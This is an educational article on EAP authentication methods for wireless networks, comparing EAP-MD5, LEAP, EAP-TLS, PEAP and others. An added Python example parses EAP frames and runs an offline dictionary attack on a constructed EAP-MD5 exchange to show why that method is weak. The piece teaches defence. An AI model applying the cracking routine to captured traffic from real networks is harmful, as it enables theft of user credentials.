
PEAP and EAP

Wireless Security and not a Child's Nursery Rhyme

By Ryan Groom, About.com

As security professionals we are constantly trading security for usability and must try to find that magic balance that enables the business while accepting a tolerable amount of risk. Wireless networks are an area where many security professionals cringe: the network has to be secured while corporate users must still be able to use it easily.

On the business side of the house there are many benefits to a wireless network. The first is incorporated directly into the name: it is wireless. A wireless network can reduce the cost associated with moves, adds and changes (MACs). Another great benefit is that users can take notes directly on their laptops during meetings in boardrooms or offices, without having to transcribe them afterwards. This can translate into a productivity boost.

The steps listed for securing a SOHO wireless connection will go a long way towards securing a home or home-office wireless network. To raise the security level of an organization's network, however, stronger Extensible Authentication Protocol (EAP) methods such as EAP-TLS (Transport Layer Security) or Protected Extensible Authentication Protocol (PEAP) must be implemented.

What is EAP?

EAP stands for Extensible Authentication Protocol. It can be applied to wired LAN connections (as 802.1X port-based authentication) but is most commonly found in wireless implementations. It is important to note that EAP is not a specific authentication method but a framework that provides the common authentication functions (request/response packets, an identity exchange, and success/failure results), and there are numerous EAP methods built on it. In a wireless network the client (supplicant) authenticates through the access point (AP), which acts as the authenticator, to an authentication server, usually a RADIUS server; the AP simply relays the EAP packets. A successful run of a keying-capable EAP method leaves the client and the server with shared key material, which is delivered to the AP and used to derive the per-session keys that protect the link. EAP takes authentication of a wireless client to a more secure level because the link is keyed only after the client has authenticated.

Common implementations of EAP and their use in wireless security are:

  • EAP-MD5 – EAP-MD5 carries a Challenge Handshake Authentication Protocol (CHAP) exchange and requires that a shared secret be established on both sides. The client hashes the challenge sent via the AP together with the secret, and the authentication server verifies the result. EAP-MD5 authenticates only the client, not the network, derives no keying material for the wireless link, and offers little security because anyone who captures the challenge/response pair can mount an offline dictionary attack against the shared secret.
  • EAP-PSK – EAP-PSK also relies on a shared secret. It offers more than EAP-MD5 (mutual authentication and session key derivation), but all of its security still rests on that single pre-shared key, and a key derived from a human-chosen password can be attacked offline, which makes it inappropriate for higher-level security requirements.
  • LEAP – Lightweight Extensible Authentication Protocol (LEAP) was created by Cisco to address the weaknesses of Wired Equivalent Privacy (WEP) and uses MS-CHAPv2 for authentication. LEAP transmits the username in the clear and exposes the password to an offline dictionary attack on the captured challenge/response, which can often be completed faster than cracking WEP itself.
  • EAP-TLS – EAP-TLS requires a server-side PKI certificate that the client trusts, to authenticate the server, and a client-side PKI certificate to authenticate the client to the server. Storing the client certificate and its private key on a smart card rather than in the client's software certificate store greatly improves its protection. The need to issue and manage a certificate for every client is what makes EAP-TLS more difficult to implement.
  • EAP-TTLS – EAP-TTLS is quite similar to EAP-TLS but removes the need for a client-side certificate. A server certificate authenticates the server to the client, and the resulting TLS tunnel then protects a conventional username/password exchange (PAP, CHAP, MS-CHAPv2 and so on) between the client and the authentication server.
  • PEAP-MSCHAPv2 – PEAP-MSCHAPv2 is very similar to EAP-TTLS in that it only requires a server-side certificate to authenticate the server to the client and establish a TLS tunnel, inside which MS-CHAPv2 authentication is performed. Like EAP-TLS, PEAP-MSCHAPv2 is widely supported. Note that the outer EAP Identity response is sent before the tunnel exists and is visible to anyone sniffing the air; unless the client is configured with an anonymous outer identity, the real username leaks. EAP-TTLS clients commonly support an anonymous outer identity and send the real username only inside the encrypted tunnel, which makes EAP-TTLS slightly better in this respect, but it is less widely supported than PEAP-MSCHAPv2. Both tunneled methods are only as strong as the client's validation of the server certificate: a client that accepts any certificate will build its tunnel to a rogue access point and hand over the inner MS-CHAPv2 exchange for offline cracking.
  • PEAP-GTC – PEAP-GTC offers the same benefits as PEAP-MSCHAPv2 but, instead of MS-CHAPv2 password authentication inside the tunnel, it uses EAP-GTC (Generic Token Card), which is designed to carry a one-time password or security token code (it can also carry a static password, protected only by the tunnel).
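The list above turns on two practical points: what a passive sniffer can learn from the EAP frames that cross the air before any tunnel exists (the outer identity and the negotiated method), and why a bare challenge/response such as EAP-MD5 falls to an offline attack. The following Python script is an added example and not code from the original article: it encodes and parses RFC 3748 EAP packets, reports what a sniffer sees, and then runs an offline dictionary attack on a constructed EAP-MD5 exchange. The frames, the username jsmith@corp.example, the secret and the wordlist are all constructed for the example; real captures would arrive inside EAPOL/802.11 frames, which are omitted here.

```python
import hashlib
import struct

# EAP codes and the method type numbers for the methods discussed above
# (values from the IANA EAP registry / RFC 3748).
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPES = {1: "Identity", 4: "EAP-MD5", 6: "EAP-GTC", 13: "EAP-TLS",
             17: "LEAP", 21: "EAP-TTLS", 25: "PEAP", 47: "EAP-PSK"}


def build_eap(code, ident, type_=None, data=b""):
    """Encode an RFC 3748 EAP packet: Code, Identifier, Length, [Type, Type-Data]."""
    body = b"" if type_ is None else bytes([type_]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def parse_eap(pkt):
    """Decode the EAP header and return code, identifier, type and type-data."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length < 4 or length != len(pkt):
        raise ValueError("bad EAP length field")
    if code in (EAP_REQUEST, EAP_RESPONSE):
        return {"code": code, "id": ident, "type": pkt[4], "data": pkt[5:length]}
    return {"code": code, "id": ident, "type": None, "data": b""}


def md5_challenge_response(ident, secret, challenge):
    """CHAP/EAP-MD5 response value: MD5(Identifier || secret || challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def build_md5_request(ident, challenge, server_name=b""):
    """EAP-Request/MD5-Challenge: Value-Size, Value (challenge), Name."""
    return build_eap(EAP_REQUEST, ident, 4,
                     bytes([len(challenge)]) + challenge + server_name)


def build_md5_response(ident, secret, challenge, username):
    """EAP-Response/MD5-Challenge: Value-Size, Value (hash), Name."""
    resp = md5_challenge_response(ident, secret, challenge)
    return build_eap(EAP_RESPONSE, ident, 4, bytes([len(resp)]) + resp + username)


def summarize_exchange(frames):
    """What a passive sniffer learns from unprotected EAP frames: the outer
    identity and the method the server proposed, both sent before any tunnel."""
    info = {"identity": None, "method": None}
    for frame in frames:
        p = parse_eap(frame)
        if p["code"] == EAP_RESPONSE and p["type"] == 1:
            info["identity"] = p["data"].decode()
        elif p["code"] == EAP_REQUEST and p["type"] not in (None, 1):
            info["method"] = EAP_TYPES.get(p["type"], f"type {p['type']}")
    return info


def crack_md5_challenge(request, response, wordlist):
    """Offline dictionary attack on a captured EAP-MD5 exchange. Nothing is sent
    to the AP: each guess is hashed and compared with the observed response."""
    req, resp = parse_eap(request), parse_eap(response)
    challenge = req["data"][1:1 + req["data"][0]]
    observed = resp["data"][1:1 + resp["data"][0]]
    for guess in wordlist:
        if md5_challenge_response(resp["id"], guess, challenge) == observed:
            return guess
    return None


def demo():
    """Constructed exchange (not a real capture): fixed challenge for a repeatable run."""
    secret = b"winter2008"
    challenge = bytes.fromhex("00112233445566778899aabbccddeeff")
    user = b"jsmith@corp.example"  # hypothetical user
    frames = [
        build_eap(EAP_REQUEST, 1, 1),            # Request/Identity
        build_eap(EAP_RESPONSE, 1, 1, user),     # Response/Identity, in the clear
        build_md5_request(2, challenge, b"ap-1"),
        build_md5_response(2, secret, challenge, user),
        build_eap(EAP_SUCCESS, 2),
    ]
    seen = summarize_exchange(frames)
    wordlist = [b"password", b"letmein", b"summer2008", b"winter2008"]
    recovered = crack_md5_challenge(frames[2], frames[3], wordlist)
    return seen, recovered


if __name__ == "__main__":
    seen, recovered = demo()
    print("sniffer saw:", seen)
    print("recovered secret:", recovered)
```

The attack needs only the two MD5-Challenge frames and runs entirely offline, which is exactly why EAP-MD5 (and LEAP, whose MS-CHAPv2 exchange is attacked the same way) is unsuitable for wireless; the tunneled methods move the credential exchange inside TLS so that a sniffer never gets a challenge/response pair to work on.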

Conclusion

Organizations wishing to implement higher security for their wireless environments should rely on EAP-TLS, EAP-TTLS, PEAP-MSCHAPv2 or PEAP-GTC. Which method an organization chooses will depend on its operating environment and on how easily one method can be deployed compared with another.

Organizations that are primarily Microsoft based may find PEAP-MSCHAPv2 or EAP-TLS fairly easy to deploy, while organizations that leverage other vendors' technologies may find it beneficial to use PEAP-GTC or EAP-TTLS. No matter which authentication method is chosen, an organization will have to invest some time in configuring back-end systems for authentication (the RADIUS server, its certificate, and client trust in that certificate), but the security benefits are definitely higher.


©2008 About.com, a part of The New York Times Company.

All rights reserved.